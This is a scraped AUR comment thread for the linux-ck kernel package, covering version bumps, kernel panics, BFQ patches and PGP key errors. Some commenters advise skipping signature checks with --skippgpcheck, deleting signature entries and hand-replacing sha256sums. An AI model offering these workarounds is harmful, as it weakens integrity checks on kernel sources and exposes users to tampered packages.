FOR help with Your misunderstanding of the issues please write directly on the BBS Arch Forums: Reference And one more thing: stop spamming and confusing users of other packages (bbswitch-ck). kyak commented on 2015-11-13 18:11 @Distorted I think I get it now. I should wait for the latest version of linux-ck-ivybridge to hit the repo-ck. After that I'd have something that provides linux-ck=4.3 and be able to install bbswitch-ck. I didn't realize I was still using linux-ck-ivybridge 4.1.3 Distorted commented on 2015-11-13 18:01 @kyak also, did you rebuild the bbswitch-ck package? I updated it for the new version. Distorted commented on 2015-11-13 18:00 @kyak You could probably edit the bbswitch-ck PKGBUILD file and change depends=linux-ck to depends=linux-ck-ivybridge. Unless they changed the actual name of the kernel, not just the package. If this is not the case, the linux-ck-ivybridge pkgbuild should say provide='linux-ck=4.3' to solve these kinds of problems. Read carefully: conflicts=('kernel26-ck' 'linux-ck-corex' 'linux-ck-p4' 'linux-ck-pentm' 'linux-ck-atom' 'linux-ck-core2' 'linux-ck-nehalem' 'linux-ck-sandybridge' 'linux-ck-ivybridge' 'linux-ck-broadwell' 'linux-ck-haswell' 'linux-ck-kx' 'linux-ck-k10' 'linux-ck-barcelona' 'linux-ck-bulldozer' 'linux-ck-piledriver' 'linux-ck-silvermont') Duh? :) Distorted commented on 2015-11-13 15:28 @kyak There are probably some packages that depend on linux-ck-ivybridge that are the cause of this error. kyak commented on 2015-11-13 15:16 Running pacaur -Syu: :: linux-ck and linux-ck-ivybridge are in conflict (linux-ck). Remove linux-ck-ivybridge? [y/N] :: unresolvable package conflicts detected :: failed to prepare transaction (conflicting dependencies) :: linux-ck and linux-ck-ivybridge are in conflict Duh? FadeMind commented on 2015-11-12 21:12 Self compiled with a custom modules list (modprobed_db).
Linux version 4.3.0-1-ck (tomasz@arch) (gcc version 5.2.0 (GCC) ) #1 SMP PREEMPT Thu Nov 12 21:46:41 CET 2015 custom modules list for my device: kernel tree: enabled blk-mq via grub flag (scsi_mod.use_blk_mq=1) (working like a charm - better than noop) dmesg: config: Good work CK and Graysky! graysky commented on 2015-11-12 19:41 Bump to v4.3-1 Changelog: Commit: LinuxChanges: Note: I am working on the related packages now (broadcom, nvidia, vbox) and I will upload to the repo once I get some feedback from AUR users as to stability so please use the AUR page to report in if something is bad (or good)! This part of the patch is not good: - sha256sums = 819961379909c028e321f37e27a8b1b08f1f1e3dd58680e07b541921282da532 + sha256sums = cf0f984ebfbb8ca8ffee1a12fd791437064b9ebe0712d6f813fd5681d4840791:38 Hi graysky, The repo download speed is doing pretty badly. Even with several Server lines in pacman.conf. Even worse, the download doesn't resume from the same place. At maximum i was able to download around 1000 Kb, and the download starts over and over again from the beginning of the file. It's been like that for a couple of days now (can't update to v4.1.9-1). It would be great if you could have a look. Thank you! I'm running with NUMA disabled and with ck patch for reverting unplugged [1]. I'm fairly stable with BFQ enabled and on BTRFS. I'll post if I got issues. Test: Normal work day, scrubs on BTRFS, kernel compilation. [1] dkaylor commented on 2015-08-05 10:53 I may have spoken too soon. System had been up and running for about 30 hours with no trouble. Then did a pacman -Syu (with linux-4.1.4 and systemd-224) and got a panic right in the middle of the kernel image generation. Reboot, cold boot, nothing helped. Panic then hang. And generic kernel image generation didn't finish, so system was toast. Will try a repair with ISO before, but wiki instructions seem dodgy. Probably should have saved pacman work for the generic kernel, lesson learned. 
Regarding NUMA - I've been running a custom linux-ck 4.1.4-1 with NUMA disabled and haven't had any hangs. Everyday workloads, several suspend/resume cycles. On the same hardware, I had to turn NUMA off on 4.0.x to get it to run. Machine is a Core2 Quad. modprobed_db uses _ instead of - for naming modules. You mixed these up. Corrected modules list: dm_bio_prison dm_bufio dm_cache dm_cache_mq dm_crypt dm_log dm_mirror dm_mod dm_persistent_data dm_region_hash dm_snapshot marceliq commented on 2015-08-04 09:31 Hi, I ran into some trouble. I'm using localmodconfig. In my modprobed.db file I can see the modules: dm_bio_prison dm_bufio dm-cache dm-cache-mq dm_crypt dm_log dm_mirror dm_mod dm_persistent_data dm_region_hash dm-snapshot But after compilation, while installing the new package, when building the new init image I get this: >>> Updating module dependencies. Please wait ... >>> Generating initial ramdisk, using mkinitcpio. Please wait... ==> Building image from preset: /etc/mkinitcpio.d/linux-ck.preset: 'default' -> -k /boot/vmlinuz-linux-ck -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-ck.img ==> Starting build: 4.1.4-1-ck -> Running build hook: [base] -> Running build hook: [udev] -> Running build hook: [autodetect] -> Running build hook: [modconf] -> Running build hook: [block] -> Running build hook: [encrypt] -> Running build hook: [lvm2] ==> ERROR: module not found: `dm-snapshot' ==> ERROR: module not found: `dm-mirror' ==> ERROR: module not found: `dm-cache' ==> ERROR: module not found: `dm-cache-mq' -> Running build hook: [filesystems] -> Running build hook: [keyboard] -> Running build hook: [fsck] ==> Generating module dependencies ==> Creating lzop-compressed initcpio image: /boot/initramfs-linux-ck.img ==> WARNING: errors were encountered during the build. The image may not be complete. Any suggestions? Thanks. When you see "ERROR: One or more PGP signatures could not be verified!"
then import the required keys with: gpg --keyserver keys.gnupg.net --recv-keys ABAF11C65A2970B130ABE3C479BE3E4300411886 647F28654894E3BD457199BE38DBBDC86092693E graysky commented on 2015-06-30 19:30 Bump to v4.0.7-1 Changelog: Commit: zoopp commented on 2015-06-25 17:28 I might have found something regarding the kernel panic. I usually compile (with the NUMA patch enabled) using the native optimizations detected by gcc, and I disable kernel debugging. Today I updated and forgot to disable kernel debugging, and for the first time since this issue arose I got the kernel panic. I then recompiled with kernel debugging disabled and the kernel panic was gone. Not sure if this is going to be of any use, but I'll leave it here just in case. OK. Given all the reports of problems with ck1 and 4.0.x, I have decided to push version 3.19.6 to the AUR (and all associated packages now depend on 3.19.x). If you experienced a kernel panic using linux-ck v4.0.x, please see this post and consider if you can help Con debug: For those interested in the 4.0.x version of the PKGBUILDs, I have made them available on repo-ck at this address: PLEASE DO NOT FLAG OUT-OF-DATE UNTIL CK FIXES THE PANICS - I WILL NOT PUSH THE AUR OR REPO UNTIL IT IS STABLE! After updating linux-ck-nehalem x86_64 from 3.19.5-1 to 4.0-1 there is a kernel panic at boot or later. linux 4.0.0-2-ARCH from the testing repo works properly. When I get more information I will post it here. I'm not able to build the ck kernel. There was never a problem from 3.12 up to 3.19.3... => kernel/Makefile:132: *** No X.509 certificates found *** My problem in short: how can I get the needed keys? [tom@frija linux-ck]$ makepkg -rsie --skippgpcheck ==> Making package: linux-ck 3.19.5-1 (Tue Apr 21 20:24:34 SKIPPED include/generated/compile.h kernel/Makefile:132: *** No X.509 certificates found ***[1]: *** Waiting for unfinished jobs...
CC security/integrity/iint.o Makefile:943: recipe for target 'arch/x86' failed make: *** [arch/x86] Error 2 make: *** Waiting for unfinished jobs.... CHK kernel/config_data.h CC security/keys/gc.o LD security/integrity/integrity.o LD security/integrity/built-in.o CC security/yama/yama_lsm.o CC security/keys/key.o CC security/keys/keyring.o CC security/keys/keyctl.o LD security/yama/yama.o LD security/yama/built-in.o CC security/commoncap.o CC security/keys/permission.o CC security/keys/process_keys.o CC security/keys/request_key.o CC security/keys/request_key_auth.o CC security/min_addr.o CC security/keys/user_defined.o CC security/security.o CC security/keys/compat.o CC security/keys/proc.o CC security/keys/sysctl.o CC security/capability.o CC security/keys/persistent.o CC security/keys/big_key.o CC security/inode.o CC security/device_cgroup.o LD security/keys/built-in.o LD security/built-in.o ==> ERROR: A failure occurred in build(). Aborting... graysky commented on 2015-04-19 14:36 Bump to v3.19.5-1 Changelog: Commit: FadeMind commented on 2015-04-19 09:08 graysky commented on 2015-04-18 19:27 @Buddlespit - Why out-of-date? See my comment from 2015-04-16 21:11. graysky commented on 2015-04-17 19:14 @fademind - dunno what to tell you; running fine on my systems (haswell and ivy with onboard video). @all - heard back from Paolo about BFQ for 4.0. Arianna and he are testing a new patch that is specifically for 4.0 so I don't plan to bump linux-ck until that happens. You can continue using the version I have linked below if you wish until then. FadeMind commented on 2015-04-17 19:11 @graysky After disabing zramswap. Boot, sddm splash, loading desktop, no wallpaper - black background, freeze mouse and keyboard, capslock key led flash in pulse. I can't do anything except hard poweroff. Keyboard and mouse not respond. Kernel panic is before SDDM startup... IMO it is Intel DRM regression... weird. 
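On the dm_/dm- confusion a few comments up: the kernel treats '-' and '_' in module names interchangeably, but modprobed-db stores the underscore form, so mixed spellings in modprobed.db lead to mismatches. A one-line normalization covers it; to_db_name is my name for it, not part of any tool:

```shell
# modprobed-db stores module names with '_' (as modprobe reports them);
# 'dm-snapshot' and 'dm_snapshot' refer to the same module.
# Normalize a name to the underscore form before comparing or storing:
to_db_name() { printf '%s\n' "$1" | tr '-' '_'; }
```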
graysky commented on 2015-04-17 18:53 @fademind - I dunno about your setup, but I see some zram lines in your dmesg. Disable zram and try again? Also, if you boot to the shell and not to sddm, does it panic? If not, can you start your xsession without sddm by running `xinit` and see if it happens. Trying to isolate which part is causing the hang. I used your SRC. After compiling, rebooting and booting from linux-ck, I get a freeze under X11.. Note: I booted from the 3.19.4-ck kernel and it PASSED fine. graysky commented on 2015-04-16 21:11 I generated a PKGBUILD+related files for linux-ck-4.0 using ck1-4.0 and using the 3.19.x series of BFQ, since there is one report on the BFQ forum that this version works fine in the 4.0 code[1]. You may download it and build/test from this file: I also emailed Paolo to see if this is the official word from his group. I don't want to put linux-ck-4.0 live in the AUR/repo until we hear back from him. Please test this out if you wish and report back good or bad. 1. graysky commented on 2015-04-16 20:57 @FadeMind - So the only difference is the ck1 patchset? Are you using BFQ at all? FadeMind commented on 2015-04-16 14:53 I built my own kernel 4.0 with the latest ck patch and I had random kernel panics during boot, with hangs. After reboot I had to recover the disk's journal. Sometimes it's fine, sometimes it just hangs and blows up. The safe thing is to wait for the 4.0.1 release update of the 4.0 kernel series. On the stock 4.0 series ARCH kernel this never happened. the 3.19.4 pkgbuild doesn't work for me [code]LC_ALL=C makepkg -rsie --skippgpcheck ==> Making package: linux-ck 3.19.4-1 (Tue Apr 14 17:01:00 kernel/Makefile:132: *** No X.509 certificates found *** CHK kernel/config_data.h Makefile:943: recipe for target 'arch/x86' failed make: *** [arch/x86] Error 2 make: *** Waiting for unfinished jobs.... ==> ERROR: A failure occurred in build(). Aborting... [/code] There are other ways, too. First off, you don't have to trust the keys.
Second, you can automate downloading them in gpg.conf --skippgpcheck is a joke. If you're too lazy to figure out how to use gpg, you shouldn't be building your kernel, to say the least. Twilight_Genesis commented on 2015-04-09 23:47)(Not recommended) Have makepkg skip PGP signature checking just pass the --skippgpcheck argument to makepkg makepkg --skippgpcheck -r -s Twilight_Genesis commented on 2015-04-09 23:45 -r -s Twilight_Genesis commented on 2015-04-09 23:41 2 Ways To fix PGP key errors: (Recommend): Twilight_Genesis commented on 2015-04-09 23:19 @radialhat: You have to either import the PGP keys in the validpgpkeys array in the PKGBUILD and trust them or if you don't care about the PGP signatures then you can pass the --skippgpcheck argument to makepkg and have it ignore the PGP signatures. Funny you all are having problems with the pgp key. I brought this up some time ago and was given a bunch of BS about why it "should" work as if I already didn't know it "should". Anyways... I've been seeing this wonderful additional problem with the "enable patch" that for some reason is also being disregarded so here's how to fix it. When you compile the package it's nice to see someone has left or did something stupid (yet again) where the file "enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz" is actually not ending in ".gz". Awesome huh? So what you have to do is this. Rename the file removing the ".gz" part and copy it to the "src" directory where you're building (you can't do this through the yaourt build because you need to intervene beyond editing the PKGBUILD). 
Recap: - run makepkg -rs (if this is how you do it) - ignore errors since this is becoming commonplace with this package anyway - edit PKGBUILD and remove .sig and .sign PGP crap since no one wants to implement this right anyway - mv enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch - update sha256sums => (4th line down) "e5b0f1882861cb1d0070e49c41a3e7390cf379f183be0bddb54144ecc68fb8f9" - cp enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch to ./src (you should be in the directory you're compiling) - Sit back and wait for fresh kernel and enjoy tjuh ~ $ gpg --keyserver hkp://keys.gnupg.net --recv-keys 00411886 6092693E gpg: directory '/home/tjuh/.gnupg' created gpg: new configuration file '/home/tjuh/.gnupg/gpg.conf' created gpg: WARNING: options in '/home/tjuh/.gnupg/gpg.conf' are not yet active during this run gpg: keybox '/home/tjuh/.gnupg/pubring.kbx' created gpg: keyserver receive failed: No keyserver available Same warning :S Execute this command: gpg --keyserver hkp://keys.gnupg.net --recv-keys 00411886 609 Tjuh commented on 2015-03-27 11:45 ==> Verifying source file signatures with gpg... linux-3.19.tar ... FAILED (unknown public key 79BE3E4300411886) patch-3.19.3 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! ==> Removing installed dependencies... checking dependencies... Packages (1) bc-1.06.95-1 Total Removed Size: 0.18 MiB :: Do you want to remove these packages? [Y/n] y (1/1) removing bc [######################] 100% tjuh ~/Downloads/linux-ck $ gpg --recv-keys 79BE3E4300411886 gpg: keyserver receive failed: No keyserver available tjuh ~/Downloads/linux-ck $ gpg --recv-keys 38DBBDC86092693E gpg: keyserver receive failed: No keyserver available Anyway to fix this? 
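As noted above, fetching the keys can be automated through gpg's own configuration instead of running --recv-keys by hand each time. A sketch of a ~/.gnupg/gpg.conf fragment; whether auto-key-retrieve helps during makepkg's verification depends on your GnuPG version and network setup:

```
# ~/.gnupg/gpg.conf (sketch)
keyserver hkp://keys.gnupg.net
auto-key-retrieve
```

With this in place, gpg attempts to fetch unknown public keys from the configured keyserver when it verifies a signature, which is the failure mode in the logs above.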
I tried running dirmngr </dev/null as root and then those 2 gpg commands again, but the keyserver is still not available. Anonymous comment on 2015-03-26 21:21 Thanks Sir_Lucjan, Graysky and Sir.Tiddlesworth -- removed my comments for errors, it was my mistakes. Fixed download interruption using tip on repo-ck wiki and had to add keys as root (not sure why using sudo wasn't working). Finally I am on ck-kx :) sir_lucjan commented on 2015-03-26 21:19 @jackpot as normal user sir_lucjan commented on 2015-03-26 21:19 jackpot Anonymous comment on 2015-03-26 21:18 #dirmngr </dev/null : keyserver receive failed: No keyserver available graysky commented on 2015-03-26 21:17 Bump to v3.19.3-1 Changelog: Commit: sir_lucjan commented on 2015-03-26 20:50 @jackpot: Anonymous comment on 2015-03-26 20:47 Thanks SirTiddle. It worked but repo-ck download speed is pain in the eyes. When doing it via AUR, its again: ==> Verifying source file signatures with gpg... linux-3.19.tar ... FAILED (unknown public key 79BE3E4300411886) patch-3.19.3 ... FAILED (unknown public key 38DBBDC86092693E) :S Sir.Tiddlesworth commented on 2015-03-26 11:39 @jackpot Run the following as root, then try again. # dirmngr </dev/null Anonymous comment on 2015-03-20 10:59 @graysky: Thanks for reply. Actually I posted after every option I could find failed. When I try to add keys as mentioned in repo-ck.com I get following: Quote: gpg: connecting dirmngr at '/root/.gnupg/S.dirmngr' failed: IPC connect call failed gpg: keyserver receive failed: No dirmngr ==> ERROR: Remote key not fetched correctly from keyserver. Unquote This is happening since 2 weeks (i.e. the time I have been trying different things) graysky commented on 2015-03-19 22:58 @jackpot - See the instructions on which should fix you up. Anonymous comment milan385 add these PGP keys: sir_lucjan commented on 2015-03-08 12:08 ==> Verifying source file signatures with gpg... linux-3.19.tar ... Passed patch-3.19.1 ... 
Passed ==> Entering fakeroot environment... ==> Creating source package... -> Adding PKGBUILD... -> Generating .SRCINFO file... -> Adding config.x86_64... -> Adding config... -> Adding linux-ck.preset... -> Adding change-default-console-loglevel.patch... -> Adding install file (linux-ck.install)... -> Compressing source package... ==> Leaving fakeroot environment. ==> Source package created: linux-ck (Sun Mar 8 13:07:38 CET 2015) milan385 commented on 2015-03-08 11:59 Have those keys in my keyring... sir_lucjan commented on 2015-03-08 11:52 milan385 commented on 2015-03-08 11:51 Now it's stuck in this moment: "Verifying source file signatures with gpg... linux-3.19.tar ... " graysky commented on 2015-03-08 11:29 Grrr... sorry about that. I refreshed the PKGBUILD for the correct checksum. The issue was that it was in fact correct, but at that time I didn't push the local copy to the repo. I then manually did so when pedrogabriel posted but the sum in the PKGBUILD was reindex against the old version. Anyway, it's right now. same issue as DaMoo. Changed sha256 as per below: --- PKGBUILD 2015-03-07 20:44:57.330121134 -0600 +++ PKGBUILD.orig 2015-03-07 20:45:26.940364828 -0600 @@ -78,7 +78,7 @@ '3dbf80df9a81a285baa5188ea8d768110f24a3e4fe8bd37e1c9d7410d60a680b' 'SKIP' '6d3043360485bbf3b8b6b780d62ff529074489e6a4d0086607de873d1278c031' - 'deacee3a3d9b06bc2aae74d908cef183dd39c4f3049567c488950f019ec95d79' + '5c3067b83d526f02be9173b92451a4b259e6245a1ee22f854cbf75b4001037d1' 'aad4a85e81b26bb7e4f44f7f1d307e812b2d02672673363a8c7acdd1174b99be' '99993989d38c452388458648ee354679d1e7763e216a06573e0b579cbf787e69' '2b3ebf5446aa3cac279842ca00bc1f2d6b7ff1766915282c201d763dbf6ca07e' DaMoo commented on 2015-03-08 01:29 I'm having an issue where a patch is failing to pass a sha256 integrity check. Here's the output from my AUR helper: ==> Validating source files with sha256sums...! 
:: failed to verify linux-ck integrity commented on 2015-02-28 21:24 Hello, got this error today: ==> Verifying source file signatures with gpg... linux-3.19.tar ... FAILED (unknown public key 79BE3E4300411886) ==> ERROR: One or more PGP signatures could not be verified! ==> ERROR: Makepkg was unable to build linux-ck. Rgds. In PKGBUILD of linux-ck all is fine. [tomasz@arch ~]$ export LC_ALL=C;pacman -Qo modprobed-db /usr/bin/modprobed-db is owned by modprobed-db 2.26-1 [tomasz@arch ~]$ export LC_ALL=C;pacman -Ql modprobed-db modprobed-db /usr/ modprobed-db /usr/bin/ modprobed-db /usr/bin/modprobed-db modprobed-db /usr/bin/modprobed_db modprobed-db /usr/share/ modprobed-db /usr/share/licenses/ modprobed-db /usr/share/licenses/modprobed-db/ modprobed-db /usr/share/licenses/modprobed-db/LICENSE modprobed-db /usr/share/man/ modprobed-db /usr/share/man/man8/ modprobed-db /usr/share/man/man8/modprobed-db.8.gz modprobed-db /usr/share/modprobed-db/ modprobed-db /usr/share/modprobed-db/modprobed-db.skel modprobed-db /usr/share/zsh/ modprobed-db /usr/share/zsh/site-functions/ modprobed-db /usr/share/zsh/site-functions/_modprobed-db hepha commented on 2015-02-27 15:16 hello /usr/bin/modprobed_db not /usr/bin/modprobed-db if [ -e /usr/bin/modprobed-db ]; then [[ ! -x /usr/bin/sudo ]] && echo "Cannot call modprobe with sudo. Install via pacman -S sudo and configure to work with this user." && exit 1 sudo /usr/bin/modprobed-db recall fi Hi graysky, When using your repo, download if often aborted with "transfer closed with XXX bytes remaining to read" - due to slow speed. Previsously it was possible to just "pacman -Syu" again and the download would resume where it had been stopped. But now the download is always started from the beginning. I'm struggling now to download 10 Mb of linux-ck-ivybridge-3.18.7-2 - even for such small size, i had to "pacman -Syu" several times, untill it succeded (the download is always started from the beginning). Anyway. 
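Several comments in this thread hit the same "FAILED (unknown public key ...)" errors from makepkg. A minimal sketch of importing the two key IDs (copied from the FAILED lines above) into the building user's keyring follows; the DRY_RUN preview guard and the function name are my additions, not part of any PKGBUILD:

```shell
#!/bin/sh
# Key IDs copied from the makepkg FAILED lines in this thread.
KEYS="79BE3E4300411886 38DBBDC86092693E"
DRY_RUN="${DRY_RUN:-1}"   # default to preview; set DRY_RUN=0 to really import

import_kernel_keys() {
    for key in $KEYS; do
        if [ "$DRY_RUN" = 1 ]; then
            echo "gpg --recv-keys $key"      # preview: show what would run
        else
            gpg --recv-keys "$key" || return 1
        fi
    done
}

import_kernel_keys
```

Run it as the same (non-root) user that runs makepkg; if you see the "No dirmngr" error quoted above, start dirmngr first with `dirmngr </dev/null` as that user.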
Did you think about "Donate" button that would probably help you improve the infrastructure a little bit? Easy way, just host your own mirror and use your favourite AUR tool: $ echo "127.0.0.1 algo.ing.unimo.it" >> /etc/hosts $ mkdir ~/patches $ cd ~/patches $ mkdir -p people/paolo/disk_sched/patches/3.18.0-v7r7/ (download patches from there) $ python2 -m SimpleHTTPServer 80 $ pacaur -S linux-ck :) graysky commented on 2015-02-07 12:30 I am hosting the BFQ patches until their site is back up. Access them like so: 1) Download the linux-ck source tarball, untar it, enter the linux-ck directory 2) sed -i 's|^_bfqpath=.*$|_bfqpath=\"\"|' PKGBUILD One of the patches fails to download from the algo.ing.unimo.it mirror: ==> ERROR: Failure while downloading 0001-block-cgroups-kconfig-build-bits-for-BFQ-v7r7-3.18.patch Suggest using the repo-ck mirror for this until things are fixed. graysky commented on 2015-01-17 14:06 prakharsingh95 commented on 2015-01-17 13:38 Tjuh commented on 2015-01-17 13:15 Trying to build this, but it fails at verifying some files: ==> Verifying source file signatures with gpg... linux-3.18.tar ... FAILED (unknown public key 79BE3E4300411886) patch-3.18.3 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! ==> Removing installed dependencies... commented on 2015-01-09 21:05 Hi, The installation broke with this new tar! I built the previous tarball for this version, and I have installed that, but not rebooted. I deleted all my previous builds. That should boot right? I mean sig files are just for verification. Bump to v3.18.2-1 Changelog: Commit: Note: This PKGBUILD now conforms to the pacman-4.2 standards of being able to verify pgp signatures of upstream files. See the following for info on how to add the needed keys or how to disable this feature entirely,[1] 1. graysky commented on 2015-01-04 14:21 sir_lucjan commented on 2015-01-04 13:59 sp1d3rmxn commented on 2015-01-04 13. 
0 0 0 0 0 0 0 0 --:--:-- 0:00:59 --:--:-- 0
curl: (22) The requested URL returned error: 503 Service Unavailable
==> ERROR: Failure while downloading 0001-block-cgroups-kconfig-build-bits-for-BFQ-v7r7-3.18.patch
Aborting...

sp1d3rmxn commented on 2015-01-04 13.

prakharsingh95 commented on 2015-01-03 14:32
Hi, I have been using 3.18.1-3-ck since Dec 26, and I have (thank God) not experienced any lockups, freezes, or weird stuff. Can anyone elaborate on this issue, or give steps to replicate it, as otherwise I would downgrade my kernel version. I am using broadcom-wl-ck. I have an i7-3610QM.

Bump to v3.18.1-3
Changelog: Build against new BFQ patchset (v7r7). Commit:
Note: I am not yet implementing the linux-ck equivalent of 'verify source signatures[1]' due to a bug affecting mkaurball[2]. 1. 2.

graysky commented on 2014-12-22 18:48
Bump to v3.18.1-3
Changelog: Build against new BFQ patchset (v7r7).
Note: I am not yet implementing the linux-ck equivalent of 'verify source signatures[1]' due to a bug affecting mkaurball[2]. Commit: 1. 2.

Update3: 3.18.1 has just been released and I have updated the source tarball for those of you wishing to compile it up on your own. A reminder that all of the other *-ck packages I maintain have now been updated and are also available on repo-ck BOTH as source tarballs and (for generic x86_64 only) as compiled packages - note that the compiled package of 3.18.1-ck-1 will be updated shortly.
*Source tarballs:
*Pre-built 3.18-ck packages (x86_64 only):

graysky commented on 2014-12-15 19:12
Update2: I now have all packages updated to build against 3.18-ck-1 including broadcom-wl-ck. Find the source package for it in the same place as I indicated below. Note - I do not have a broadcom wireless chipset so I cannot test the module. I can modprobe it and it does insert. Can someone with this hardware try it and report back?

graysky commented on 2014-12-14 17:51
Update: All packages except for broadcom-wl-ck have been updated to work with 3.18.0-1-ck.
Again, I will wait to diff the linux-ck PKGBUILD and associated files against the official ARCH version once it publishes, but those wishing to upgrade to 3.18.0-1-ck now can either build your own from the src tarballs or use the pre-built packages you can download directly with `pacman -U` if you wish. Otherwise, just keep waiting for the official release.
*Source tarballs:
*Pre-built 3.18-ck packages (x86_64 only):

Dunno how long, as CK does this in his spare time. For reference:
BFS for v3.16 = 13 days
BFS for v3.15 = 26 days
BFS for v3.14 = 36 days
BFS for v3.13 = 18 days
BFS for v3.12 = 15 days
BFS for v3.11 = 7 days
BFS for v3.10 = 10 days
BFS for v3.9 = 8 days
BFS for v3.8 = 13 days
BFS for v3.7 = 4 days
BFS for v3.6 = 12 days
BFS for v3.5 = 10 days
BFS for v3.4 = 12 days

I believe it's an issue with ccache and btrfs on SSD. When I disable ccache it works. The problem is I'm getting a kernel panic, so compilation stops half-way. After a hard reset I clean out the src and pkg directories and restart the compilation. Then, I assume, the objects are half created and I again hit a compilation error (not a kernel panic). It's an obscure case, so the AUR comments might not be the proper place to solve this.

@Tjuh. I faced a similar issue. Just boot into the Arch default kernel, plug in all your peripherals and get them working, and then build linux-ck with localmodconfig=y. Everything will work out of the box then.
@graysky. Is it possible for you to enable SCSI, USB, etc. by default (i.e. add an option to the PKGBUILD like minimal_support=y)?

graysky commented on 2014-10-10 16:25
Odds are that using that option, you did not compile in USB support. I suggest using modprobed-db if you haven't already done so. Boot into a kernel with all modules, load those you will need, i.e. insert the external USB drive, populate the db and try rebuilding.

Please please, add a warning in big bold letters for people like me who just want to use localmodcfg and minimal nconfig.
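graysky's advice above (boot a fully modular kernel, load everything you need so modprobed-db records it, then rebuild) corresponds to the localmodconfig toggles in the PKGBUILD. A sketch of the relevant fragment; the exact variable names vary between PKGBUILD versions, so treat them as illustrative rather than authoritative:

```shell
# Near the top of the linux-ck PKGBUILD (variable names assumed from this era):
_makenconfig=     # non-empty: run 'make nconfig' to hand-tune the config
_localmodcfg=y    # non-empty: trim the config to modules logged by modprobed-db
# Prerequisite, done while booted into a stock (fully modular) kernel with
# all peripherals plugged in and in use:
#   $ modprobed-db store      # log the currently loaded modules into the db
# The PKGBUILD then calls 'modprobed-db recall' during the build.
```

If the db was never populated with, say, USB storage modules in use, the trimmed kernel will lack them, which is exactly the "still no USB" trap described in the surrounding comments.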
I compiled 7 times before, got kernel-failed-to-load errors, googled, fixed them myself, and still no USB. Finally I realized that the USB announce and support options were unchecked. Phew.

: I get the same sha256sum as you, but the PKGBUILD contains a different one (4c44ad820fae8afaf3ad55fa7b191cc15e61829293a074126be780a35275b7c6).

clfarron4 commented on 2014-09-18 11:13
@coderkun: What do you get as the sum for that file? I get this:
% sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz
a9ca0e6fc01a3d34058b6cc9cdb560f62233f2eca5917db65dc0b29772bb236e  enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz

Thanks graysky. Which leads me to a question - SMT nice aside, if I have a non-SMT processor (4 cores = 4 threads, nice and simple), does disabling SMT in the kernel config accomplish anything other than saving a little overhead? What's your opinion on heavily customized kernel configs in general?

So, as BFS 450 now includes the SMT nice work, will I be able to turn it off in the kernel config? I have a non-hyperthreaded Core 2 Quad, so I always turn off SMT scheduling, although I'm not sure it matters much. CK mentions a bfs450-nosmt-buildfix.patch to make it impossible to enable SMT nice on a non-SMT kernel, but I'm not sure it's included in the PKGBUILD. I'm fine with just disabling it in the config.

Thanks so much for the kernel, graysky. I'm a Folding@home user () trying to improve F@H performance by testing new kernels. Some time ago, around 3.10.1, your kernel was not good for folding; in one test it was the worst. I'm comparing NUMA=ON and NUMA=OFF, and with your changes and some study of the kernel, only ck will fold on my PC. But... when will you bump the pkgver? Any date?

graysky commented on 2014-08-01 13:42
Note that CK just posted an experimental patch that, in his words, "Works for me flawlessly on all my stuff, but it's still pretty new."
You can read about it at the link below. I don't want to enable it by default in the repo but do want to allow users a chance to try it out in the PKGBUILD. See the first set of comments to enable it. As always, post your experiences, both good and bad, to CK's blog so he can make ck1 and BFS more and more powerful and robust for everyone to enjoy. Note - I am not going to bump the pkgver to 2 since I just rebuilt the repo overnight and since this is really no change unless you enable it.

graysky commented on 2014-08-01 02:36
Bump to v3.15.8-1 Changelog: Commit:

graysky commented on 2014-07-30 19:22
Yeah, I saw them, and in the past CK has considered the patch experimental; as noted in his blog post, "this patch by itself does nothing unless other code uses the locks." I don't want to add an experimental patch to the package, much less to repo packages people depend on for stable systems.

clfarron4 commented on 2014-07-30 19:10
I assume the flagger saw a new post on the CK blog and flagged out-of-date without reading. That said, the new post on the CK blog refers to these patches: Just after I built 3.15.7-1-ck-pax as well (with no time left today or tomorrow to muse over these new patches).

I'm not the one flagging it out of date, but it's probably because ck released BFS 449. graysky stated earlier that he was busy with family stuff this weekend, so he just hasn't had a chance to do 3.15.3-2 yet.

Bump to v3.14.10-1 Changelog: Commit:
Note - CK should be releasing 3.15-ck1 shortly. We are having family come out to visit for the 4th of July holiday, which may prevent me from updating all the linux-ck packages (nvidia, broadcom, vbox, etc.) to the 3.15 release until after they leave.

: Sorry, this could actually be something on my end. Tried downloading the file another few times and was still getting the mismatched hash. Looked at it a bit further and it turns out that the file was in plain text (not gz) - somewhere along the line it was being uncompressed automatically.
Have a feeling it may be something to do with my ISP as I teathered up my mobile issues the same curl -O ... command, and got the correct response. clfarron4 commented on 2014-06-18 12:12 The sha256sum in the PKGBUILD is correct. clfarron4 commented on 2014-06-18 12:06 illis commented on 2014-06-17 23:03 sha256 match seems to be failing for the gcc patch. sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+.patch.gz 4883a4d45fdcb02600af976be8b9b89f459775ac8916712dfdefd29419c3eacf enable_additional_cpu_optimizations_for_gcc_v4.9+.patch.gz patching file include/uapi/linux/sched.h patching file include/linux/sched/rt.h patching file kernel/stop_machine/ia64/kvm/kvm-ia64.c patching file arch/powerpc/kvm/book3s_hv.c Hunk #1 succeeded at 1509 (offset -2 lines). patching file arch/x86/Kconfig patching file arch/x86/kvm/x86.c Hunk #1 succeeded at 6114 (offset -1 lines). patching file kernel/Kconfig.preempt patching file kernel/Kconfig.hz patching file Makefile ==> ERROR: A failure occurred in prepare(). Aborting... Generally speaking, sure this is an issue with the Makefile being patched, has anyone else had this issue? If its just me, I dont mind trying to patch the patch, and provide back. graysky commented on 2014-06-16 22:03 Bump to v3.14.8-1 Changelog: Commit: clfarron4 commented on 2014-06-16 21:56 mariojuniorjp commented on 2014-06-14 11:45 Seriously, I just wanted to know why it is not working out the compilation of the kernel. Done again, and it was until the end. Once finished installing the kernel, simply aur started again with the same procedure. Canceled, ran the grub, it detected the new kernel, I sent restart and when I went to look, simply appears only the default system kernel. I've compiled again (manual mode), and it 